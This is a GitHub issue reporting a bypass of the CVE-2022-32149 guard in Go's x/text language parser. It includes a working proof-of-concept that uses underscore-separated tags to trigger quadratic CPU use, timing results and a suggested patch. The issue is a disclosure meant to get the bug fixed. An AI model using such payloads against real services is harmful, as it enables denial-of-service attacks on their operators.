Skip to content

x/text/language: ParseAcceptLanguage dash-count guard bypassed by '_' separator (incomplete CVE-2022-32149 fix) #79684

Description

@tonghuaroot

What version of Go are you using (go version)?

go1.26.1 darwin/arm64 (also reproduces on linux/amd64)

What did you do?

golang.org/x/text/language.ParseAcceptLanguage has a dash-count guard added in CL 442235 / commit 434eadcdbc3b0256971992e8c70027278364c72c (the CVE-2022-32149 fix):

// language/parse.go:169 (HEAD 3ef517e623a4bfc08d6457f87d73afda7af7d8e1)
if strings.Count(s, "-") > 1000 {
    return nil, nil, errTagListTooLarge
}

The guard inspects only '-' (U+002D), but the scanner converts every '_' (U+005F) to '-' inside init:

// internal/language/parse.go:104-111
func (s *scanner) init() {
    for i, c := range s.b {
        if c == '_' {
            s.b[i] = '-'
        }
    }
    s.scan()
}

A payload built with '_' as the BCP 47 separator (e.g. POSIX en_US-style) bypasses the guard and re-triggers the O(N²) gobble path the original fix was meant to block.

Reproduction

go.mod:

module poc-xtext-pal-underscore
go 1.25.0
require golang.org/x/text v0.37.0

main.go:

package main

import (
    "fmt"
    "strings"
    "time"

    "golang.org/x/text/language"
)

func buildAttackPayload(nTokens int) string {
    parts := make([]string, 0, nTokens+1)
    parts = append(parts, "en")
    for i := 0; i < nTokens; i++ {
        parts = append(parts, "abcdefghi") // 9 chars, fails len <= 8
    }
    return strings.Join(parts, "_")
}

func main() {
    for _, n := range []int{1000, 10000, 50000, 100000} {
        p := buildAttackPayload(n)
        t0 := time.Now()
        _, _, err := language.ParseAcceptLanguage(p)
        fmt.Printf("attack n=%d  bytes=%d  -count=%d  _count=%d  elapsed=%v  err=%v\n",
            n, len(p), strings.Count(p, "-"), strings.Count(p, "_"), time.Since(t0), err)
    }

    // Baseline: same payload with '-' separator -> guard fires
    parts := make([]string, 0, 100001)
    parts = append(parts, "en")
    for i := 0; i < 100000; i++ {
        parts = append(parts, "abcdefghi")
    }
    baseline := strings.Join(parts, "-")
    t0 := time.Now()
    _, _, err := language.ParseAcceptLanguage(baseline)
    fmt.Printf("baseline    bytes=%d  -count=%d  elapsed=%v  err=%v\n",
        len(baseline), strings.Count(baseline, "-"), time.Since(t0), err)
}

Measured (go1.26.1 darwin/arm64, M1 Pro, golang.org/x/text v0.37.0):

attack n=1000    bytes=10002   -count=0  _count=1000   elapsed=134.96µs  err=language: tag is not well-formed
attack n=10000   bytes=100002  -count=0  _count=10000  elapsed=9.24ms    err=language: tag is not well-formed
attack n=50000   bytes=500002  -count=0  _count=50000  elapsed=411.15ms  err=language: tag is not well-formed
attack n=100000  bytes=1000002 -count=0  _count=100000 elapsed=1.35s     err=language: tag is not well-formed
baseline         bytes=1000002 -count=100000 elapsed=49.92µs err=tag list exceeds max length

Identical input length and token count; the _-separator path is ~27,000x slower because the dash-count guard does not fire. go tool pprof shows 96% of time in runtime.memmove called from internal/language.(*scanner).gobble. Time scales ~4x per 2x tokens, consistent with O(N²).

What did you expect to see?

ParseAcceptLanguage rejects the input via errTagListTooLarge because the post-init token count exceeds 1000.

What did you see instead?

ParseAcceptLanguage runs the O(N²) gobble path on the converted buffer and consumes ~1.35s of CPU per 1 MB request.

Suggested fix

Count '_' alongside '-' in the guard. The scanner aliases them, so the guard should too:

--- a/language/parse.go
+++ b/language/parse.go
@@ -166,8 +166,11 @@ func ParseAcceptLanguage(s string) (tag []Tag, q []float32, err error) {
         }
     }()

-    if strings.Count(s, "-") > 1000 {
-        return nil, nil, errTagListTooLarge
+    // The BCP 47 scanner aliases '_' to '-' in scanner.init
+    // (internal/language/parse.go); the guard must count both.
+    if strings.Count(s, "-")+strings.Count(s, "_") > 1000 {
+        return nil, nil, errTagListTooLarge
     }

A defense-in-depth amendment is to apply an analogous separator-count guard at language.Parse and language.MustParse, which feed the same scanner and have no guard at all today.

Routing note

I originally sent this to security@golang.org 2026-05-25. The Go Security Officers determined 2026-05-27 it does not qualify as a security issue and invited a public upstream issue, which this is.

CC

@neild (Neal Patel) for visibility per the security-team thread.

Metadata

Metadata

Assignees

No one assigned

    Labels

    NeedsInvestigationSomeone must examine and confirm this is a valid issue and not a duplicate of an existing one.

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions